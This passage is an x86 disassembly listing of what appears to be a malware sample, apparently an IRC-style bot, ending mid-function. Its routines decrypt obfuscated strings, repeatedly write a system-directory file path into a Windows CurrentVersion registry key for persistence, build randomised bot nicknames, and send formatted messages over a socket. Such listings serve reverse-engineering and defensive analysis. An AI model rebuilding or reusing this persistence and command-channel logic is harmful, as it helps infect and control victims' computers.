		sub	esp, 0Ch
		push	ebx
		mov	ebx, [esp+10h+arg_4]
		mov	eax, [ebx]
		push	ebp
		mov	ebp, [esp+14h+arg_0]
		push	esi
		push	edi
		and	eax, 7Fh
		mov	edi, 80h
		sub	edi, eax
		mov	esi, ecx
		xor	ecx, ecx
		add	[ebx], ebp
		adc	[ebx+4], ecx
		mov	edx, [ebx+4]
		cmp	edx, ecx
		ja	short loc_41791B
		jb	short loc_417913
		mov	ecx, [ebx]
		cmp	ecx, ebp
		jnb	short loc_41791B

loc_417913:				; CODE XREF: sub_4178E0+2Bj
		add	dword ptr [ebx+8], 1
		adc	dword ptr [ebx+0Ch], 0

loc_41791B:				; CODE XREF: sub_4178E0+29j
					; sub_4178E0+31j
		cmp	ebp, edi
		jb	loc_4179BF

loc_417923:				; CODE XREF: sub_4178E0+D9j
		push	edi
		lea	edx, [ebx+eax+50h]
		push	esi
		push	edx
		call	sub_4081B0
		add	esi, edi
		add	esp, 0Ch
		sub	ebp, edi
		mov	[esp+1Ch+var_4], esi
		mov	[esp+1Ch+arg_0], ebp
		mov	edi, 80h
		mov	[esp+1Ch+var_8], 0
		mov	esi, 10h
		lea	edx, [ebx+0D0h]

loc_417956:				; CODE XREF: sub_4178E0+BCj
		mov	eax, [edx-8]
		mov	ecx, [edx-4]
		sub	edx, 8
		mov	ebx, eax
		sub	esi, 1
		ror	ebx, 8
		and	ebx, 0FF00FF00h
		rol	eax, 8
		and	eax, 0FF00FFh
		or	ebx, eax
		mov	ebp, ecx
		xor	eax, eax
		ror	ebp, 8
		and	ebp, 0FF00FF00h
		rol	ecx, 8
		and	ecx, 0FF00FFh
		or	ebp, ecx
		xor	ecx, ecx
		or	eax, ebp
		or	ebx, ecx
		test	esi, esi
		mov	[edx], eax
		mov	[edx+4], ebx
		jnz	short loc_417956
		mov	ebx, [esp+1Ch+arg_4]
		push	ebx
		call	sub_415050
		mov	ebp, [esp+20h+arg_0]
		mov	eax, [esp+20h+var_8]
		mov	esi, [esp+20h+var_4]
		add	esp, 4
		cmp	ebp, edi
		jnb	loc_417923

loc_4179BF:				; CODE XREF: sub_4178E0+3Dj
		push	ebp
		lea	edx, [eax+ebx+50h]
		push	esi
		push	edx
		call	sub_4081B0
		add	esp, 0Ch
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		add	esp, 0Ch
		retn
sub_4178E0	endp

; ---------------------------------------------------------------------------
		align 10h
		push	ecx
		push	eax
		call	sub_417760
		add	esp, 4
		pop	ecx
		retn

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4179EC	proc near		; CODE XREF: sub_4179EC+D5p
					; sub_41B3E7+5F4p

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_C		= word ptr  14h
arg_14		= dword	ptr  1Ch
arg_1C		= dword	ptr  24h
arg_20		= dword	ptr  28h
arg_24		= dword	ptr  2Ch
arg_28		= byte ptr  30h
arg_2B		= byte ptr  33h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		cmp	[ebp+arg_28], 0
		push	ebx
		push	esi
		push	edi
		jz	short loc_417A05
		mov	ecx, [ebp+arg_4]
		shr	ecx, 18h
		or	cl, 1
		jmp	short loc_417A0B
; ---------------------------------------------------------------------------

loc_417A05:				; CODE XREF: sub_4179EC+Cj
		mov	cl, byte ptr [ebp+arg_4+3]
		and	cl, 0FEh

loc_417A0B:				; CODE XREF: sub_4179EC+17j
		movzx	eax, word ptr [ebp+arg_24]
		mov	ebx, [ebp+arg_20]
		lea	edx, [ebx+18h]
		cmp	edx, eax
		ja	short loc_417A28
		lea	edx, [ebx+18h]
		mov	[ebp+arg_14], ebx
		or	cl, 2
		mov	[ebp+arg_2B], 0
		jmp	short loc_417A39
; ---------------------------------------------------------------------------

loc_417A28:				; CODE XREF: sub_4179EC+2Bj
		mov	dx, word ptr [ebp+arg_24]
		add	eax, 0FFFFFFE8h
		mov	[ebp+arg_14], eax
		and	cl, 0FDh
		mov	[ebp+arg_2B], 1

loc_417A39:				; CODE XREF: sub_4179EC+3Aj
		movzx	eax, dx
		push	eax
		mov	byte ptr [ebp+arg_4+3],	cl
		mov	[ebp+arg_C], dx
		mov	[ebp+var_4], eax
		call	sub_403C6E
		test	eax, eax
		pop	ecx
		mov	[ebp+arg_20], eax
		jz	loc_417AD8
		push	6
		pop	ecx
		mov	edi, eax
		lea	esi, [ebp+arg_4]
		rep movsd
		mov	edi, [ebp+arg_14]
		mov	esi, [ebp+arg_1C]
		push	edi
		add	eax, 18h
		push	esi
		push	eax
		call	sub_4081B0
		add	esp, 0Ch
		push	0
		lea	eax, [ebp+var_8]
		push	eax
		push	[ebp+var_4]
		push	[ebp+arg_20]
		push	[ebp+arg_0]
		call	ds:off_41E088
		test	eax, eax
		jz	short loc_417ACF
		mov	eax, [ebp+var_4]
		cmp	[ebp+var_8], eax
		jnz	short loc_417ACF
		push	[ebp+arg_20]
		call	sub_403B91
		cmp	[ebp+arg_2B], 0
		pop	ecx
		jz	short loc_417ACB
		push	0
		push	[ebp+arg_24]
		sub	ebx, edi
		push	ebx
		add	edi, esi
		push	edi
		sub	esp, 18h
		push	6
		pop	ecx
		mov	edi, esp
		push	[ebp+arg_0]
		lea	esi, [ebp+arg_4]
		rep movsd
		call	sub_4179EC
		add	esp, 2Ch
		jmp	short loc_417ADA
; ---------------------------------------------------------------------------

loc_417ACB:				; CODE XREF: sub_4179EC+B8j
		mov	al, 1
		jmp	short loc_417ADA
; ---------------------------------------------------------------------------

loc_417ACF:				; CODE XREF: sub_4179EC+A1j
					; sub_4179EC+A9j
		push	[ebp+arg_20]
		call	sub_403B91
		pop	ecx

loc_417AD8:				; CODE XREF: sub_4179EC+66j
		xor	al, al

loc_417ADA:				; CODE XREF: sub_4179EC+DDj
					; sub_4179EC+E1j
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_4179EC	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_417ADF	proc near		; CODE XREF: sub_417C06+154p
					; sub_417D99+152p

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ebx
		xor	ebx, ebx
		push	ebx
		lea	eax, [ebp+var_4]
		push	eax
		push	ebx
		push	0F003Fh
		push	ebx
		push	ebx
		push	ebx
		push	[ebp+arg_0]
		push	80000002h
		call	ds:off_41E004
		test	eax, eax
		jz	short loc_417B14
		push	[ebp+var_4]
		call	ds:off_41E010
		xor	al, al

loc_417B11:				; CODE XREF: sub_417ADF+68j
		pop	ebx
		leave
		retn
; ---------------------------------------------------------------------------

loc_417B14:				; CODE XREF: sub_417ADF+25j
		mov	eax, [ebp+arg_8]
		push	esi
		lea	esi, [eax+1]

loc_417B1B:				; CODE XREF: sub_417ADF+41j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_417B1B
		sub	eax, esi
		push	eax
		push	[ebp+arg_8]
		push	1
		push	ebx
		push	[ebp+arg_4]
		push	[ebp+var_4]
		call	ds:off_41E00C
		test	eax, eax
		pop	esi
		jz	short loc_417B49

loc_417B3C:				; CODE XREF: sub_417ADF+6Cj
		push	[ebp+var_4]
		call	ds:off_41E010
		mov	al, bl
		jmp	short loc_417B11
; ---------------------------------------------------------------------------

loc_417B49:				; CODE XREF: sub_417ADF+5Bj
		mov	bl, 1
		jmp	short loc_417B3C
sub_417ADF	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_417B4D	proc near		; CODE XREF: sub_417C06+113p
					; sub_417D99+100p ...

var_4		= dword	ptr -4
arg_0		= byte ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		push	ecx
		lea	eax, [ebp+var_4]
		push	eax
		push	1
		push	0
		push	[ebp+arg_4]
		push	80000002h
		call	ds:off_41E02C
		test	eax, eax
		jnz	short loc_417B95
		lea	eax, [ebp+arg_10]
		push	eax
		push	[ebp+arg_C]
		lea	eax, [ebp+arg_0]
		push	eax
		push	0
		push	[ebp+arg_8]
		push	[ebp+var_4]
		call	ds:off_41E008
		test	eax, eax
		jnz	short loc_417B95
		push	[ebp+var_4]
		call	ds:off_41E010
		mov	al, 1
		leave
		retn
; ---------------------------------------------------------------------------

loc_417B95:				; CODE XREF: sub_417B4D+1Cj
					; sub_417B4D+39j
		push	[ebp+var_4]
		call	ds:off_41E010
		push	[ebp+arg_10]
		push	0
		push	[ebp+arg_C]
		call	sub_408130
		add	esp, 0Ch
		xor	al, al
		leave
		retn
sub_417B4D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_417BB2	proc near		; CODE XREF: sub_41A0A7+134p
					; sub_41A6CF+F2p

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ebx
		xor	ebx, ebx
		push	ebx
		lea	eax, [ebp+var_4]
		push	eax
		push	ebx
		push	0F003Fh
		push	ebx
		push	ebx
		push	ebx
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	ds:off_41E004
		test	eax, eax
		jz	short loc_417BE5
		push	[ebp+var_4]
		call	ds:off_41E010
		xor	al, al

loc_417BE2:				; CODE XREF: sub_417BB2+4Ej
		pop	ebx
		leave
		retn
; ---------------------------------------------------------------------------

loc_417BE5:				; CODE XREF: sub_417BB2+23j
		push	[ebp+arg_8]
		push	[ebp+var_4]
		call	ds:off_41E000
		test	eax, eax
		jz	short loc_417C02

loc_417BF5:				; CODE XREF: sub_417BB2+52j
		push	[ebp+var_4]
		call	ds:off_41E010
		mov	al, bl
		jmp	short loc_417BE2
; ---------------------------------------------------------------------------

loc_417C02:				; CODE XREF: sub_417BB2+41j
		mov	bl, 1
		jmp	short loc_417BF5
sub_417BB2	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=94h


sub_417C06	proc near		; CODE XREF: sub_41C77E:loc_41CA88p

var_114		= dword	ptr -114h
var_110		= dword	ptr -110h
var_10C		= dword	ptr -10Ch
var_108		= dword	ptr -108h
var_104		= byte ptr -104h
var_4		= dword	ptr -4

		push	ebp
		lea	ebp, [esp-94h]
		sub	esp, 114h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+94h+var_4], eax
		push	ebx
		push	esi
		push	edi
		mov	edi, 100h
		push	edi
		call	sub_402BD6
		mov	esi, eax
		push	edi
		mov	[ebp+94h+var_110], esi
		call	sub_402BD6
		push	edi
		mov	[ebp+94h+var_108], eax
		call	sub_402BD6
		push	edi
		mov	[ebp+94h+var_114], eax
		call	sub_402BD6
		push	[ebp+94h+var_114]
		mov	[ebp+94h+var_10C], eax
		call	sub_402FD3
		push	eax
		xor	ebx, ebx
		push	ebx
		push	[ebp+94h+var_114]
		call	sub_408130
		push	[ebp+94h+var_10C]
		call	sub_402FD3
		push	eax
		push	ebx
		push	[ebp+94h+var_10C]
		call	sub_408130
		push	edi
		lea	eax, [ebp+94h+var_104]
		push	ebx
		push	eax
		call	sub_408130
		push	esi
		call	sub_402FD3
		add	esp, 40h
		push	eax
		push	ebx
		push	esi
		call	sub_408130
		push	[ebp+94h+var_108]
		call	sub_402FD3
		push	eax
		push	ebx
		push	[ebp+94h+var_108]
		call	sub_408130
		push	esi
		call	sub_402FD3
		push	eax
		mov	ebx, offset aTdvIStdIvd	; "»’¤¢´³¨µ¸á’¤³·¨¢¤"
		call	sub_41A301
		mov	esi, [ebp+94h+var_108]
		push	esi
		call	sub_402FD3
		push	eax
		mov	ebx, offset aVqdD ; "²»²·¢ï¤¹¤"
		call	sub_41A301
		mov	ebx, [ebp+94h+var_114]
		push	ebx
		call	sub_402FD3
		add	esp, 30h
		dec	eax
		push	eax
		push	ebx
		call	ds:dword_41E0F0	; GetSystemDirectoryA
		push	esi
		mov	esi, [ebp+94h+var_10C]
		push	ebx
		push	offset dword_421298
		push	esi
		call	sub_402FD3
		pop	ecx
		dec	eax
		push	eax
		push	esi
		call	sub_40307C
		mov	eax, esi
		add	esp, 14h
		lea	ecx, [eax+1]

loc_417CFE:				; CODE XREF: sub_417C06+FDj
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_417CFE
		sub	eax, ecx
		push	edi
		mov	[eax+esi], dl
		lea	eax, [ebp+94h+var_104]
		push	eax
		push	[ebp+94h+var_110]
		push	offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
		push	1
		call	sub_417B4D
		add	esp, 14h
		test	al, al
		jz	short loc_417D51
		lea	eax, [ebp+94h+var_104]
		mov	ecx, esi

loc_417D2A:				; CODE XREF: sub_417C06+13Cj
		mov	dl, [ecx]
		cmp	dl, [eax]
		jnz	short loc_417D48
		test	dl, dl
		jz	short loc_417D44
		mov	dl, [ecx+1]
		cmp	dl, [eax+1]
		jnz	short loc_417D48
		inc	ecx
		inc	ecx
		inc	eax
		inc	eax
		test	dl, dl
		jnz	short loc_417D2A

loc_417D44:				; CODE XREF: sub_417C06+12Cj
		xor	eax, eax
		jmp	short loc_417D4D
; ---------------------------------------------------------------------------

loc_417D48:				; CODE XREF: sub_417C06+128j
					; sub_417C06+134j
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh

loc_417D4D:				; CODE XREF: sub_417C06+140j
		test	eax, eax
		jz	short loc_417D62

loc_417D51:				; CODE XREF: sub_417C06+11Dj
		push	esi
		push	[ebp+94h+var_110]
		push	offset aSoftwareMicr_1 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
		call	sub_417ADF
		add	esp, 0Ch

loc_417D62:				; CODE XREF: sub_417C06+149j
		push	[ebp+94h+var_110]
		call	sub_403129
		push	[ebp+94h+var_108]
		call	sub_403129
		push	ebx
		call	sub_403129
		push	esi
		call	sub_403129
		mov	ecx, [ebp+94h+var_4]
		add	esp, 10h
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		add	ebp, 94h
		leave
		retn
sub_417C06	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: noreturn bp-based	frame


sub_417D99	proc near		; DATA XREF: sub_41C77E+31Bo

var_504		= byte ptr -504h
var_404		= byte ptr -404h
var_403		= byte ptr -403h
var_304		= byte ptr -304h
var_303		= byte ptr -303h
var_204		= byte ptr -204h
var_203		= byte ptr -203h
var_104		= byte ptr -104h
var_103		= byte ptr -103h
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 504h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		push	esi
		push	edi
		mov	esi, 0FFh
		xor	ebx, ebx
		push	esi
		lea	eax, [ebp+var_203]
		push	ebx
		push	eax
		mov	[ebp+var_204], bl
		call	sub_408130
		push	esi
		lea	eax, [ebp+var_403]
		push	ebx
		push	eax
		mov	[ebp+var_404], bl
		call	sub_408130
		push	esi
		lea	eax, [ebp+var_303]
		push	ebx
		push	eax
		mov	[ebp+var_304], bl
		call	sub_408130
		push	esi
		lea	eax, [ebp+var_103]
		push	ebx
		push	eax
		mov	[ebp+var_104], bl
		call	sub_408130
		add	esp, 30h
		mov	edi, 100h

loc_417E0E:				; CODE XREF: sub_417D99+1AEj
		push	edi
		lea	esi, [ebp+var_204]
		mov	ebx, offset aTdvIStdIvd	; "»’¤¢´³¨µ¸á’¤³·¨¢¤"
		call	sub_41A301
		push	edi
		lea	esi, [ebp+var_404]
		mov	ebx, offset aVqdD ; "²»²·¢ï¤¹¤"
		call	sub_41A301
		pop	ecx
		pop	ecx
		mov	esi, 0FFh
		push	esi
		lea	eax, [ebp+var_304]
		push	eax
		call	ds:dword_41E0F0	; GetSystemDirectoryA
		lea	eax, [ebp+var_404]
		push	eax
		lea	eax, [ebp+var_304]
		push	eax
		push	offset aSS_3	; "%s\\%s"
		lea	eax, [ebp+var_104]
		push	esi
		push	eax
		call	sub_40307C
		lea	eax, [ebp+var_104]
		add	esp, 14h
		lea	ecx, [eax+1]

loc_417E71:				; CODE XREF: sub_417D99+DDj
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_417E71
		sub	eax, ecx
		xor	ebx, ebx
		mov	[ebp+eax+var_104], bl
		push	edi
		lea	eax, [ebp+var_504]
		push	eax
		lea	eax, [ebp+var_204]
		push	eax
		push	offset aSoftwareMicr_2 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
		push	1
		call	sub_417B4D
		add	esp, 14h
		test	al, al
		jz	short loc_417ED8
		lea	ecx, [ebp+var_504]
		lea	eax, [ebp+var_104]

loc_417EB1:				; CODE XREF: sub_417D99+130j
		mov	dl, [eax]
		cmp	dl, [ecx]
		jnz	short loc_417ECF
		cmp	dl, bl
		jz	short loc_417ECB
		mov	dl, [eax+1]
		cmp	dl, [ecx+1]
		jnz	short loc_417ECF
		inc	eax
		inc	eax
		inc	ecx
		inc	ecx
		cmp	dl, bl
		jnz	short loc_417EB1

loc_417ECB:				; CODE XREF: sub_417D99+120j
		xor	eax, eax
		jmp	short loc_417ED4
; ---------------------------------------------------------------------------

loc_417ECF:				; CODE XREF: sub_417D99+11Cj
					; sub_417D99+128j
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh

loc_417ED4:				; CODE XREF: sub_417D99+134j
		cmp	eax, ebx
		jz	short loc_417EF3

loc_417ED8:				; CODE XREF: sub_417D99+10Aj
		lea	eax, [ebp+var_104]
		push	eax
		lea	eax, [ebp+var_204]
		push	eax
		push	offset aSoftwareMicr_3 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
		call	sub_417ADF
		add	esp, 0Ch

loc_417EF3:				; CODE XREF: sub_417D99+13Dj
		push	edi
		lea	eax, [ebp+var_304]
		push	ebx
		push	eax
		call	sub_408130
		push	edi
		lea	eax, [ebp+var_104]
		push	ebx
		push	eax
		call	sub_408130
		push	edi
		lea	eax, [ebp+var_504]
		push	ebx
		push	eax
		call	sub_408130
		push	edi
		lea	eax, [ebp+var_204]
		push	ebx
		push	eax
		call	sub_408130
		push	edi
		lea	eax, [ebp+var_404]
		push	ebx
		push	eax
		call	sub_408130
		add	esp, 3Ch
		push	3A98h
		call	ds:off_41E0F8
		jmp	loc_417E0E
sub_417D99	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_417F4C	proc near		; CODE XREF: sub_401C1D+C9p
					; sub_401C1D+E4p ...

var_204		= byte ptr -204h
var_203		= byte ptr -203h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= byte ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 204h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	esi
		mov	esi, 1FFh
		push	esi
		lea	eax, [ebp+var_203]
		push	0
		push	eax
		mov	[ebp+var_204], 0
		call	sub_408130
		lea	eax, [ebp+arg_4]
		push	eax
		push	[ebp+arg_0]
		lea	eax, [ebp+var_204]
		push	esi
		push	eax
		call	sub_4039C4
		lea	eax, [ebp+var_204]
		add	esp, 1Ch
		lea	esi, [eax+1]

loc_417F9B:				; CODE XREF: sub_417F4C+54j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_417F9B
		sub	eax, esi
		mov	[ebp+eax+var_204], cl
		lea	eax, [ebp+var_204]
		lea	esi, [eax+1]

loc_417FB4:				; CODE XREF: sub_417F4C+6Dj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_417FB4
		push	0
		sub	eax, esi
		push	eax
		lea	eax, [ebp+var_204]
		push	eax
		push	dword ptr [edi]
		call	ds:dword_41E228	; send
		mov	ecx, [ebp+var_4]
		test	eax, eax
		setnz	al
		xor	ecx, ebp
		pop	esi
		call	sub_402C9E
		leave
		retn
sub_417F4C	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_417FE1	proc near		; CODE XREF: sub_40177B+268p
					; sub_4019F3+21Ap ...

var_40C		= dword	ptr -40Ch
var_408		= dword	ptr -408h
var_404		= byte ptr -404h
var_403		= byte ptr -403h
var_204		= byte ptr -204h
var_203		= byte ptr -203h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= byte ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= byte ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 40Ch
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_0]
		push	ebx
		push	edi
		mov	[ebp+var_408], eax
		mov	eax, [ebp+arg_8]
		mov	edi, 1FFh
		xor	ebx, ebx
		push	edi
		mov	[ebp+var_40C], eax
		lea	eax, [ebp+var_203]
		push	ebx
		push	eax
		mov	[ebp+var_204], bl
		call	sub_408130
		push	edi
		lea	eax, [ebp+var_403]
		push	ebx
		push	eax
		mov	[ebp+var_404], bl
		call	sub_408130
		add	esp, 18h
		cmp	[ebp+arg_4], 1
		jz	loc_4180FD
		push	esi
		push	0Dh
		call	sub_402BD6
		mov	esi, eax
		lea	eax, [ebp+arg_10]
		push	eax
		push	[ebp+arg_C]
		lea	eax, [ebp+var_404]
		push	edi
		push	eax
		call	sub_4039C4
		lea	eax, [ebp+var_404]
		add	esp, 14h
		lea	ecx, [eax+1]

loc_41806E:				; CODE XREF: sub_417FE1+92j
		mov	dl, [eax]
		inc	eax
		cmp	dl, bl
		jnz	short loc_41806E
		sub	eax, ecx
		push	esi
		mov	[ebp+eax+var_404], bl
		call	sub_402FD3
		push	eax
		mov	ebx, offset aSuicmtj ; "‘“ˆ—Œ’†"
		call	sub_41A301
		lea	eax, [ebp+var_404]
		push	eax
		push	[ebp+var_40C]
		lea	eax, [ebp+var_204]
		push	esi
		push	offset aSSS_1	; "%s %s %s\r\n"
		push	edi
		push	eax
		call	sub_40307C
		lea	eax, [ebp+var_204]
		add	esp, 20h
		lea	ecx, [eax+1]

loc_4180BB:				; CODE XREF: sub_417FE1+DFj
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_4180BB
		sub	eax, ecx
		push	esi
		mov	[ebp+eax+var_204], dl
		call	sub_403129
		pop	ecx
		lea	eax, [ebp+var_204]
		lea	ecx, [eax+1]
		pop	esi

loc_4180DC:				; CODE XREF: sub_417FE1+100j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_4180DC
		sub	eax, ecx
		push	0
		push	eax
		lea	eax, [ebp+var_204]
		push	eax
		mov	eax, [ebp+var_408]
		push	dword ptr [eax]
		call	ds:dword_41E228	; send

loc_4180FD:				; CODE XREF: sub_417FE1+5Dj
		mov	ecx, [ebp+var_4]
		pop	edi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
sub_417FE1	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41810B	proc near		; CODE XREF: sub_418CAF+23Bp
					; sub_418F1C+39p

var_48		= dword	ptr -48h
var_44		= dword	ptr -44h
var_40		= byte ptr -40h
var_3F		= byte ptr -3Fh
var_3C		= byte ptr -3Ch
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 48h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	esi
		push	edi
		xor	eax, eax
		mov	[ebp+var_40], 0
		lea	edi, [ebp+var_3F]
		stosw
		stosb
		push	0Dh
		pop	ecx
		mov	esi, offset aQwertyuiopasdf ; "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPLKJ"...
		lea	edi, [ebp+var_3C]
		rep movsd
		lea	eax, [ebp+var_48]
		push	eax
		movsb
		call	ds:off_41E1E8
		call	ds:dword_41E104	; GetTickCount
		mov	ecx, [ebp+var_44]
		mov	edx, [ebp+var_48]
		add	ecx, edx
		cmp	eax, ecx
		jb	short loc_418157
		add	ecx, eax
		jmp	short loc_418159
; ---------------------------------------------------------------------------

loc_418157:				; CODE XREF: sub_41810B+46j
		sub	ecx, eax

loc_418159:				; CODE XREF: sub_41810B+4Aj
		push	ecx
		call	sub_4038E4
		pop	ecx
		push	8
		pop	ecx
		xor	eax, eax
		mov	edi, ebx
		rep stosd
		push	offset asc_4214BC ; "["
		stosw
		push	22h
		push	ebx
		stosb
		call	sub_40307C
		mov	eax, ebx
		add	esp, 0Ch
		lea	esi, [eax+1]

loc_418181:				; CODE XREF: sub_41810B+7Bj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_418181
		xor	edi, edi
		sub	eax, esi
		push	edi
		mov	[eax+ebx], cl
		push	4
		pop	ecx
		lea	esi, [ebp+var_40]
		call	sub_419AD1
		pop	ecx
		mov	eax, esi
		push	eax
		push	ebx
		push	offset aSS	; "%s%s|"
		push	22h
		push	ebx
		call	sub_40307C
		mov	eax, ebx
		add	esp, 14h
		lea	esi, [eax+1]

loc_4181B5:				; CODE XREF: sub_41810B+AFj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_4181B5
		sub	eax, esi
		push	edi
		push	4
		lea	esi, [ebp+var_40]
		mov	[eax+ebx], cl
		call	sub_419A9F
		mov	eax, esi
		push	eax
		push	ebx
		push	offset aSS_0	; "%s%s|"
		push	22h
		push	ebx
		call	sub_40307C
		mov	eax, ebx
		add	esp, 1Ch
		lea	esi, [eax+1]

loc_4181E5:				; CODE XREF: sub_41810B+DFj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_4181E5
		sub	eax, esi
		mov	[eax+ebx], cl
		call	sub_419FC7
		test	al, al
		jz	short loc_41821C
		push	ebx
		push	offset aSp	; "%sP|"
		push	22h
		push	ebx
		call	sub_40307C
		mov	eax, ebx
		add	esp, 10h
		lea	esi, [eax+1]

loc_418210:				; CODE XREF: sub_41810B+10Aj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_418210
		sub	eax, esi
		mov	[eax+ebx], cl

loc_41821C:				; CODE XREF: sub_41810B+EDj
		call	sub_419A20
		mov	eax, dword_4290BC
		cmp	eax, edi
		mov	ecx, dword_4290B8
		jg	short loc_418258
		jl	short loc_418237
		cmp	ecx, 0Ah
		jnb	short loc_418258

loc_418237:				; CODE XREF: sub_41810B+125j
		push	eax
		push	ecx
		push	ebx
		push	offset aS0I64u	; "%s0%I64u|"
		push	22h
		push	ebx
		call	sub_40307C
		mov	eax, ebx
		add	esp, 18h
		lea	esi, [eax+1]

loc_41824F:				; CODE XREF: sub_41810B+149j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_41824F
		jmp	short loc_418277
; ---------------------------------------------------------------------------

loc_418258:				; CODE XREF: sub_41810B+123j
					; sub_41810B+12Aj
		push	eax
		push	ecx
		push	ebx
		push	offset aSI64u	; "%s%I64u|"
		push	22h
		push	ebx
		call	sub_40307C
		mov	eax, ebx
		add	esp, 18h
		lea	esi, [eax+1]

loc_418270:				; CODE XREF: sub_41810B+16Aj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_418270

loc_418277:				; CODE XREF: sub_41810B+14Bj
		sub	eax, esi
		mov	byte ptr [eax+ebx], 0
		xor	esi, esi
		cmp	dword_427C04, edi
		jle	short loc_4182C4

loc_418287:				; CODE XREF: sub_41810B+1B7j
		call	sub_4038F1
		push	31h
		pop	ecx
		xor	edx, edx
		div	ecx
		movsx	eax, [ebp+edx+var_3C]
		push	eax
		push	ebx
		push	offset aSC	; "%s%c"
		push	22h
		push	ebx
		call	sub_40307C
		mov	eax, ebx
		add	esp, 14h
		lea	edi, [eax+1]

loc_4182AF:				; CODE XREF: sub_41810B+1A9j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_4182AF
		sub	eax, edi
		inc	esi
		mov	[eax+ebx], cl
		cmp	esi, dword_427C04
		jl	short loc_418287

loc_4182C4:				; CODE XREF: sub_41810B+17Aj
		push	ebx
		push	offset aS_0	; "%s]"
		push	22h
		push	ebx
		call	sub_40307C
		mov	eax, ebx
		add	esp, 10h
		lea	esi, [eax+1]

loc_4182DA:				; CODE XREF: sub_41810B+1D4j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_4182DA
		sub	eax, esi
		mov	[eax+ebx], cl
		mov	ecx, [ebp+var_4]
		pop	edi
		xor	ecx, ebp
		mov	eax, ebx
		pop	esi
		call	sub_402C9E
		leave
		retn
sub_41810B	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4182F6	proc near		; CODE XREF: sub_4184BD+6A7p

var_820		= dword	ptr -820h
var_81C		= dword	ptr -81Ch
var_20		= byte ptr -20h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 824h
		push	ebx
		push	esi
		push	edi
		push	offset asc_421474 ; " "
		push	[ebp+arg_14]
		xor	ebx, ebx
		mov	byte ptr [ebp+var_8], 0
		mov	[ebp+var_4], ebx
		call	sub_403FC4
		jmp	short loc_418358
; ---------------------------------------------------------------------------

loc_41831A:				; CODE XREF: sub_4182F6+68j
		mov	eax, [ebp+var_4]
		push	offset aS_9	; "-s"
		push	esi
